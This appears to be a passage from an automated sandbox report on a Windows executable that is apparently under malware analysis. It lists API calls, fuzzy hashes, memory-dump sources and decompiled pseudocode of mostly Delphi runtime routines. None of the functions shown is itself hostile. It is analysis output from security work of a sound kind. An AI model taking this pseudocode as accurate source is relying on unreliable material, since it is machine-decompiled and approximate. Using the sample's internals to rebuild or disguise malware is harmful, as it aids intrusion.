                                                  • Part of subcall function 0077695C: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00776A1A,?,?,?,?,00776B2E,007747F3,0077483A), ref: 0077699B
                                                  • Part of subcall function 0077695C: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00776A1A,?,?,?), ref: 007769B6
                                                  • Part of subcall function 0077695C: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00776A1A), ref: 007769BC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                • String ID: MZP
                                                • API String ID: 3490077880-2889622443
                                                • Opcode ID: 661a889378b60e9f03aeb24257628d88f9b135a1cf69fca45814ad682c619eba
                                                • Instruction ID: 159507dc0b18154136d1bcbfb5456832f98e7bfede83e1a1bdaa672f553d1982
                                                • Opcode Fuzzy Hash: 661a889378b60e9f03aeb24257628d88f9b135a1cf69fca45814ad682c619eba
                                                • Instruction Fuzzy Hash: ED318120A00F41DFDF31AB79888D71A7BE46B14394F16C829E54DA729AD77CEC88CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 0077621E
                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?), ref: 0077625B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID: h`@$h`@
                                                • API String ID: 3192549508-260506153
                                                • Opcode ID: c3bcd7a7115e3f9042ecd462c28f039e3290c599e2e0e79360682854d97f69cb
                                                • Instruction ID: 4d6f241e8aa6a13b7a2fa5bb95c9adbf2fd7e89c224b92cdc9d3e6d572c4b6df
                                                • Opcode Fuzzy Hash: c3bcd7a7115e3f9042ecd462c28f039e3290c599e2e0e79360682854d97f69cb
                                                • Instruction Fuzzy Hash: 03317CB0604600AFEB64DB14C888F2B77A9FB85794F18C659E50C97256CB3CEC51CB25
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNEL32(00405704,004056E4), ref: 00775885
                                                • GetProcAddress.KERNEL32(00000000,00405704), ref: 0077588B
                                                • GetLastError.KERNEL32(00000000,?,00000000,00405704,004056E4), ref: 007758A7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: AddressErrorHandleLastModuleProc
                                                • String ID: @
                                                • API String ID: 4275029093-2766056989
                                                • Opcode ID: 5f6edf7398b59d43bd50dce053ac9b3a2b15859288e47cbb4df52aa4161e66a0
                                                • Instruction ID: a4122b9bc18376403315edbaf8bf0cc9350fa0e39a770b2f30ca1428055dcad5
                                                • Opcode Fuzzy Hash: 5f6edf7398b59d43bd50dce053ac9b3a2b15859288e47cbb4df52aa4161e66a0
                                                • Instruction Fuzzy Hash: CA117270E00648EFDF10DBA4C949B5DB7B8EB05390F11C4A6E91CA7182E77D9A40CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 85%
                                                			E004173A0(intOrPtr* __eax, void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* _a4) {
                                                				intOrPtr _v8;
                                                				intOrPtr _v12;
                                                				char _v534;
                                                				short _v1056;
                                                				short _v1568;
                                                				struct _MEMORY_BASIC_INFORMATION _v1596;
                                                				char _v1600;
                                                				intOrPtr _v1604;
                                                				char _v1608;
                                                				intOrPtr _v1612;
                                                				char _v1616;
                                                				intOrPtr _v1620;
                                                				char _v1624;
                                                				char* _v1628;
                                                				char _v1632;
                                                				char _v1636;
                                                				char _v1640;
                                                				intOrPtr _t55;
                                                				signed int _t76;
                                                				void* _t82;
                                                				intOrPtr _t83;
                                                				intOrPtr _t95;
                                                				intOrPtr _t98;
                                                				intOrPtr _t100;
                                                				intOrPtr* _t102;
                                                				void* _t105;
                                                
                                                				_v1640 = 0;
                                                				_v8 = __ecx;
                                                				_t82 = __edx;
                                                				_t102 = __eax;
                                                				_push(_t105);
                                                				_push(0x41754c);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t105 + 0xfffff99c;
                                                				VirtualQuery(__edx,  &_v1596, 0x1c);
                                                				if(_v1596.State != 0x1000 || GetModuleFileNameW(_v1596.AllocationBase,  &_v1056, 0x105) == 0) {
                                                					GetModuleFileNameW( *0x503620,  &_v1056, 0x105);
                                                					_v12 = E00417394(_t82);
                                                				} else {
                                                					_v12 = _t82 - _v1596.AllocationBase;
                                                				}
                                                				E00414AD8( &_v534, 0x104, E00418924() + 2);
                                                				_t83 = 0x417560;
                                                				_t100 = 0x417560;
                                                				_t95 =  *0x411ad4; // 0x411b2c
                                                				if(E00405190(_t102, _t95) != 0) {
                                                					_t83 = E00407330( *((intOrPtr*)(_t102 + 4)));
                                                					_t76 = E00406DB8(_t83);
                                                					if(_t76 != 0 &&  *((short*)(_t83 + _t76 * 2 - 2)) != 0x2e) {
                                                						_t100 = 0x417564;
                                                					}
                                                				}
                                                				_t55 =  *0x4ff12c; // 0x40c150
                                                				_t18 = _t55 + 4; // 0xffea
                                                				LoadStringW(E00408664( *0x503620),  *_t18,  &_v1568, 0x100);
                                                				E00404D0C( *_t102,  &_v1640);
                                                				_v1636 = _v1640;
                                                				_v1632 = 0x11;
                                                				_v1628 =  &_v534;
                                                				_v1624 = 0xa;
                                                				_v1620 = _v12;
                                                				_v1616 = 5;
                                                				_v1612 = _t83;
                                                				_v1608 = 0xa;
                                                				_v1604 = _t100;
                                                				_v1600 = 0xa;
                                                				E00414C18(4,  &_v1636);
                                                				E00406DB8(_v8);
                                                				_pop(_t98);
                                                				 *[fs:eax] = _t98;
                                                				_push(0x417553);
                                                				return E004069A8( &_v1640);
                                                 			}

                                                APIs
                                                • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041754C), ref: 004173D3
                                                • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 004173F7
                                                • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 00417412
                                                • LoadStringW.USER32(00000000,0000FFEA,?,00000100), ref: 004174AD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: FileModuleName$LoadQueryStringVirtual
                                                • String ID:
                                                • API String ID: 3990497365-0
                                                • Opcode ID: 0e4673a18678baf22685d2963611963e236131dd4c1e7acec65ecb95e0382641
                                                • Instruction ID: 9442957bc2cbf2ec707a5283f17e7f6dfd39538e8e34a022e56a37078e0b6c55
                                                • Opcode Fuzzy Hash: 0e4673a18678baf22685d2963611963e236131dd4c1e7acec65ecb95e0382641
                                                • Instruction Fuzzy Hash: B0411B70A042189FDB20DF65CC81BDAB7BAAB98304F4140EAA508E7251D7799E94CF59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetThreadUILanguage.KERNEL32(?,00000000), ref: 00778F9D
                                                • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 00778FFB
                                                • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 00779058
                                                • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0077908B
                                                  • Part of subcall function 00778F48: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,00779009), ref: 00778F5F
                                                  • Part of subcall function 00778F48: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,00779009), ref: 00778F7C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: Thread$LanguagesPreferred$Language
                                                • String ID:
                                                • API String ID: 2255706666-0
                                                • Opcode ID: d8e2cd40550274a393343dd5fab702c8f9688287b1040cad562b31341f566789
                                                • Instruction ID: 71088f28729be0048893a5ca0e7513b2c416a51a9315373668d242023755c8cd
                                                • Opcode Fuzzy Hash: d8e2cd40550274a393343dd5fab702c8f9688287b1040cad562b31341f566789
                                                • Instruction Fuzzy Hash: 79316030E1011EDBDF50DFA8C888AAEB3B5FF14341F408165E659E7291DB789E05CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 58%
                                                			E00408D3C(signed short __eax, void* __edx) {
                                                				char _v8;
                                                				char _v12;
                                                				intOrPtr _v16;
                                                				signed int _v20;
                                                				short _v22;
                                                				short _v24;
                                                				char _v26;
                                                				char _v32;
                                                				void* __ebp;
                                                				void* _t39;
                                                				void* _t55;
                                                				void* _t59;
                                                				short* _t62;
                                                				signed short _t66;
                                                				void* _t67;
                                                				void* _t68;
                                                				signed short _t79;
                                                				void* _t81;
                                                
                                                				_t81 = __edx;
                                                				_t66 = __eax;
                                                				_v16 = 0;
                                                				if(__eax !=  *0x502c04()) {
                                                					_v16 = E00408CF8( &_v8);
                                                					_t79 = _t66;
                                                					_v20 = 3;
                                                					_t62 =  &_v26;
                                                					do {
                                                						 *_t62 =  *(0xf + "0123456789ABCDEF") & 0x000000ff;
                                                						_t79 = (_t79 & 0x0000ffff) >> 4;
                                                						_v20 = _v20 - 1;
                                                						_t62 = _t62 - 2;
                                                					} while (_v20 != 0xffffffff);
                                                					_v24 = 0;
                                                					_v22 = 0;
                                                					 *0x502c00(4,  &_v32,  &_v20);
                                                				}
                                                				_t39 = E00408CF8( &_v12);
                                                				_t67 = _t39;
                                                				if(_t67 != 0) {
                                                					_t55 = _v12 - 2;
                                                					if(_t55 >= 0) {
                                                						_t59 = _t55 + 1;
                                                						_v20 = 0;
                                                						do {
                                                							if( *((short*)(_t67 + _v20 * 2)) == 0) {
                                                								 *((short*)(_t67 + _v20 * 2)) = 0x2c;
                                                							}
                                                							_v20 = _v20 + 1;
                                                							_t59 = _t59 - 1;
                                                						} while (_t59 != 0);
                                                					}
                                                					E00407388(_t81, _t67);
                                                					_t39 = E004044D0(_t67);
                                                				}
                                                				if(_v16 != 0) {
                                                					 *0x502c00(0, 0,  &_v20);
                                                					_t68 = E00408CF8( &_v12);
                                                					if(_v8 != _v12 || E00408CD4(_v16, _v12, _t68) != 0) {
                                                						 *0x502c00(8, _v16,  &_v20);
                                                					}
                                                					E004044D0(_t68);
                                                					return E004044D0(_v16);
                                                				}
                                                				return _t39;
                                                 			}

                                                APIs
                                                • GetThreadUILanguage.KERNEL32(?,00000000), ref: 00408D4D
                                                • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 00408DAB
                                                • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 00408E08
                                                • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 00408E3B
                                                  • Part of subcall function 00408CF8: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,00408DB9), ref: 00408D0F
                                                  • Part of subcall function 00408CF8: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,00408DB9), ref: 00408D2C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: Thread$LanguagesPreferred$Language
                                                • String ID:
                                                • API String ID: 2255706666-0
                                                • Opcode ID: d8e2cd40550274a393343dd5fab702c8f9688287b1040cad562b31341f566789
                                                • Instruction ID: 1047a55321476b545476524d9605cfe666873ad8380eb7f67878ffd240dfdd41
                                                • Opcode Fuzzy Hash: d8e2cd40550274a393343dd5fab702c8f9688287b1040cad562b31341f566789
                                                • Instruction Fuzzy Hash: 3A316F70A0021AABDB10EBA9C984AAEB3B5FF14304F40417AE555F72D1DB789E04DB55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 67%
                                                			E0041801C(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                                				char _v8;
                                                				struct _MEMORY_BASIC_INFORMATION _v36;
                                                				short _v558;
                                                				char _v564;
                                                				intOrPtr _v568;
                                                				char _v572;
                                                				char _v576;
                                                				char _v580;
                                                				intOrPtr _v584;
                                                				char _v588;
                                                				void* _v592;
                                                				char _v596;
                                                				char _v600;
                                                				char _v604;
                                                				char _v608;
                                                				intOrPtr _v612;
                                                				char _v616;
                                                				char _v620;
                                                				char _v624;
                                                				void* _v628;
                                                				char _v632;
                                                				void* _t64;
                                                				intOrPtr _t65;
                                                				intOrPtr _t82;
                                                				intOrPtr _t103;
                                                				intOrPtr _t107;
                                                				intOrPtr _t110;
                                                				intOrPtr _t112;
                                                				intOrPtr _t115;
                                                				intOrPtr _t127;
                                                				void* _t136;
                                                				intOrPtr _t138;
                                                				void* _t141;
                                                				void* _t143;
                                                
                                                				_t136 = __edi;
                                                				_t140 = _t141;
                                                				_v632 = 0;
                                                				_v596 = 0;
                                                				_v604 = 0;
                                                				_v600 = 0;
                                                				_v8 = 0;
                                                				_push(_t141);
                                                				_push(0x418222);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t141 + 0xfffffd8c;
                                                				_t64 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x14)) - 1;
                                                				_t143 = _t64;
                                                				if(_t143 < 0) {
                                                					_t65 =  *0x4ff144; // 0x40c178
                                                					E0040AF40(_t65,  &_v8, _t140);
                                                				} else {
                                                					if(_t143 == 0) {
                                                						_t107 =  *0x4ff0a8; // 0x40c180
                                                						E0040AF40(_t107,  &_v8, _t140);
                                                					} else {
                                                						if(_t64 == 7) {
                                                							_t110 =  *0x4fef9c; // 0x40c188
                                                							E0040AF40(_t110,  &_v8, _t140);
                                                						} else {
                                                							_t112 =  *0x4ff04c; // 0x40c190
                                                							E0040AF40(_t112,  &_v8, _t140);
                                                						}
                                                					}
                                                				}
                                                				_t115 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x18));
                                                				VirtualQuery( *( *((intOrPtr*)(_a4 - 4)) + 0xc),  &_v36, 0x1c);
                                                				_t138 = _v36.State;
                                                				if(_t138 == 0x1000 || _t138 == 0x10000) {
                                                					if(GetModuleFileNameW(_v36.AllocationBase,  &_v558, 0x105) == 0) {
                                                						goto L12;
                                                					} else {
                                                						_v592 =  *( *((intOrPtr*)(_a4 - 4)) + 0xc);
                                                						_v588 = 5;
                                                						E004073C4( &_v600, 0x105,  &_v558);
                                                						E004149FC(_v600, 0x105,  &_v596);
                                                						_v584 = _v596;
                                                						_v580 = 0x11;
                                                						_v576 = _v8;
                                                						_v572 = 0x11;
                                                						_v568 = _t115;
                                                						_v564 = 5;
                                                						_push( &_v592);
                                                						_t103 =  *0x4ff0dc; // 0x40c210
                                                						E0040AF40(_t103,  &_v604, _t140, 3);
                                                						E00417718(_t115, _v604, 1, _t136, _t138);
                                                					}
                                                				} else {
                                                					L12:
                                                					_v628 =  *( *((intOrPtr*)(_a4 - 4)) + 0xc);
                                                					_v624 = 5;
                                                					_v620 = _v8;
                                                					_v616 = 0x11;
                                                					_v612 = _t115;
                                                					_v608 = 5;
                                                					_push( &_v628);
                                                					_t82 =  *0x4ff0ac; // 0x40c128
                                                					E0040AF40(_t82,  &_v632, _t140, 2);
                                                					E00417718(_t115, _v632, 1, _t136, _t138);
                                                				}
                                                				_pop(_t127);
                                                				 *[fs:eax] = _t127;
                                                				_push(0x418229);
                                                				E004069A8( &_v632);
                                                				E00406A08( &_v604, 3);
                                                				return E004069A8( &_v8);
                                                 			}

                                                APIs
                                                • VirtualQuery.KERNEL32(?,?,0000001C,00000000,00418222), ref: 004180BC
                                                • GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,0000001C,00000000,00418222), ref: 004180E8
                                                  • Part of subcall function 0040AF40: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 0040AF85
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: FileLoadModuleNameQueryStringVirtual
                                                • String ID: d.A
                                                • API String ID: 902310565-3125002948
                                                • Opcode ID: b42593c92c92184516b9cef0d76e77f21b4aab7d58c08c1544ea3ad1d4ed0584
                                                • Instruction ID: 525eca4c3fd5eb5eb0a7a0e6142f0cf4160a84f628be2892f59521738665aab3
                                                • Opcode Fuzzy Hash: b42593c92c92184516b9cef0d76e77f21b4aab7d58c08c1544ea3ad1d4ed0584
                                                • Instruction Fuzzy Hash: 65510B74A04659DFCB10DF28CD88ADDBBF4AB08304F1141EAA908E7351DB78AE84CF59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • VirtualQuery.KERNEL32(?,?,0000001C,00000000,00418222), ref: 0078830C
                                                • GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,0000001C,00000000,00418222), ref: 00788338
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: FileModuleNameQueryVirtual
                                                • String ID: d.A
                                                • API String ID: 2827130835-3125002948
                                                • Opcode ID: cfa5a9ee4bcfd4e326f6554e8350daa400a7c1724553340675d3a2f381e2dbdc
                                                • Instruction ID: f5145ad5f6c0152b86f27cdb35e77e03fa510ab6be862c62a7823d36938efe05
                                                • Opcode Fuzzy Hash: cfa5a9ee4bcfd4e326f6554e8350daa400a7c1724553340675d3a2f381e2dbdc
                                                • Instruction Fuzzy Hash: 93310734A04658DFCB50EF68CD88AADBBF5BB08340F5081A5E808E7361D778AE84CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 63%
                                                			E00405F62(void* __ebx, void* __edi, void* __esi, void* __ebp, struct _EXCEPTION_POINTERS _a4, intOrPtr _a8, intOrPtr _a12) {
                                                				intOrPtr _v8;
                                                				struct _EXCEPTION_RECORD* _t22;
                                                				intOrPtr* _t25;
                                                				long _t28;
                                                				long _t30;
                                                				long _t31;
                                                				long _t32;
                                                				void* _t33;
                                                				void* _t38;
                                                				long _t41;
                                                				intOrPtr* _t43;
                                                				intOrPtr _t44;
                                                				void* _t45;
                                                				void* _t47;
                                                				void* _t48;
                                                				intOrPtr _t50;
                                                
                                                				_t48 = __ebp;
                                                				_t47 = __esi;
                                                				_t45 = __edi;
                                                				_t33 = __ebx;
                                                				_t22 = _a4.ExceptionRecord;
                                                				if((_t22->ExceptionFlags & 0x00000006) == 0) {
                                                					_t41 = _t22->ExceptionInformation[1];
                                                					_t38 = _t22->ExceptionInformation;
                                                					if(_t22->ExceptionCode == 0xeedfade) {
                                                						L11:
                                                						if( *0x4fd025 <= 1 ||  *0x4fd024 > 0) {
                                                							goto L14;
                                                						}
                                                						_t28 = UnhandledExceptionFilter( &_a4);
                                                						_t38 = _t38;
                                                						_t41 = _t41;
                                                						_t22 = _t22;
                                                						if(_t28 != 0) {
                                                							goto L14;
                                                						}
                                                					} else {
                                                						asm("cld");
                                                						E00404CF0(_t22);
                                                						_t43 =  *0x500018; // 0x0
                                                						if(_t43 != 0) {
                                                							_t30 =  *_t43();
                                                							if(_t30 != 0) {
                                                								_t44 = _a12;
                                                								if(_a4.ExceptionRecord->ExceptionCode == 0xeefface) {
                                                									L10:
                                                									_t41 = _t30;
                                                									_t22 = _a4.ExceptionRecord;
                                                									_t38 = _t22->ExceptionAddress;
                                                									goto L11;
                                                								} else {
                                                									_t30 = E00405E90(_t30, _t44, __edi);
                                                									if( *0x4fd025 <= 0 ||  *0x4fd024 > 0) {
                                                										goto L10;
                                                									} else {
                                                										_t31 = UnhandledExceptionFilter( &_a4);
                                                										_t32 = _t30;
                                                										if(_t31 != 0) {
                                                											_t41 = _t32;
                                                											_t22 = _a4.ExceptionRecord;
                                                											_t38 = _t22->ExceptionAddress;
                                                											L14:
                                                											_t22->ExceptionFlags = _t22->ExceptionFlags | 0x00000002;
                                                											 *0x500020(_a8, 0x40603c, _t22, 0, _t38, _t41, _t22,  *[fs:ebx], _t48, _t45, _t47, _t33);
                                                											_t46 = _v8;
                                                											_t25 = E0040B254();
                                                											_push( *_t25);
                                                											 *_t25 = _t50;
                                                											 *((intOrPtr*)(_v8 + 4)) = E00406068;
                                                											E00405ECC(_t25,  *((intOrPtr*)(_t46 + 4)) + 5, _t47);
                                                											goto __ebx;
                                                										}
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                				return 1;
                                                			}




















                                                APIs
                                                • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 00405FCE
                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,Function_00005F64), ref: 0040600B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID: |'@
                                                • API String ID: 3192549508-246660051
                                                • Opcode ID: 5daa1cd48c89220020c054309c4a92c65f499552fbca0f12ab2ab44c6d7456c2
                                                • Instruction ID: c47cca87b62f3344d8f6197094fff981340a7294386157ef5818deb2500a34ec
                                                • Opcode Fuzzy Hash: 5daa1cd48c89220020c054309c4a92c65f499552fbca0f12ab2ab44c6d7456c2
                                                • Instruction Fuzzy Hash: ED317C70604201AFE320DB14C888F2BB7E9EB88714F59C56EE849A72D1C738EC55CB69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 0077621E
                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?), ref: 0077625B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID: h`@$h`@
                                                • API String ID: 3192549508-260506153
                                                • Opcode ID: 9aae00d555ed47a26df3ac35eabf8a4c45b95ebfaa01d97bb4fbe5a8c811ebfe
                                                • Instruction ID: d233a6b7be1dc98254f94d51ff406ecddd089077756b6374de78b8f9a42e1b3e
                                                • Opcode Fuzzy Hash: 9aae00d555ed47a26df3ac35eabf8a4c45b95ebfaa01d97bb4fbe5a8c811ebfe
                                                • Instruction Fuzzy Hash: 1D2158B0604600AFDB24DB14C889F2BB7A9FB89784F19C658E50857256CB38EC50CB21
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?), ref: 0077625B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID: h`@$h`@
                                                • API String ID: 3192549508-260506153
                                                • Opcode ID: 5dcfbe91997fda09dda9f410798b7811f6f2ae19734f0890e2cdf2b9de41c9ef
                                                • Instruction ID: 902dab4390311bf552edb4148f78d6ca4fc98488fb9d515ac28604e73b3957a4
                                                • Opcode Fuzzy Hash: 5dcfbe91997fda09dda9f410798b7811f6f2ae19734f0890e2cdf2b9de41c9ef
                                                • Instruction Fuzzy Hash: 1001DEB1104780BFEB109B50CC8AF67BBB8FB49794F15C96EF10892153C728A856CA75
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00419498() {
                                                				void* __ebx;
                                                				struct HINSTANCE__* _t1;
                                                				void* _t4;
                                                
                                                				_t1 = GetModuleHandleW(L"kernel32.dll");
                                                				_t3 = _t1;
                                                				if(_t1 != 0) {
                                                					_t1 = E0040BE94(_t3, _t4, _t3, L"GetDiskFreeSpaceExW");
                                                					 *0x4fde1c = _t1;
                                                				}
                                                				if( *0x4fde1c == 0) {
                                                					 *0x4fde1c = E00414A38;
                                                					return E00414A38;
                                                				}
                                                				return _t1;
                                                			}







                                                APIs
                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,004FC4D3,00000000,004FC50A), ref: 0041949E
                                                  • Part of subcall function 0040BE94: GetProcAddress.KERNEL32(?,?), ref: 0040BEBE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: AddressHandleModuleProc
                                                • String ID: GetDiskFreeSpaceExW$kernel32.dll
                                                • API String ID: 1646373207-1127948838
                                                • Opcode ID: 79d50ef1922d0a428f94ee757ce890a5fb7e45e2f119e74be6d5f260fdc1a8d1
                                                • Instruction ID: a76bc45287c6addecd0ebc72c0796b415913eb71ebf04ee8c7a74ab1d42abfd1
                                                • Opcode Fuzzy Hash: 79d50ef1922d0a428f94ee757ce890a5fb7e45e2f119e74be6d5f260fdc1a8d1
                                                • Instruction Fuzzy Hash: E2D05E70B847015BDB106BA29C916AB3298C728349B20843BE100AA292D7BC4CA3CF8C
                                                Uniqueness

                                                Uniqueness Score: -1.00%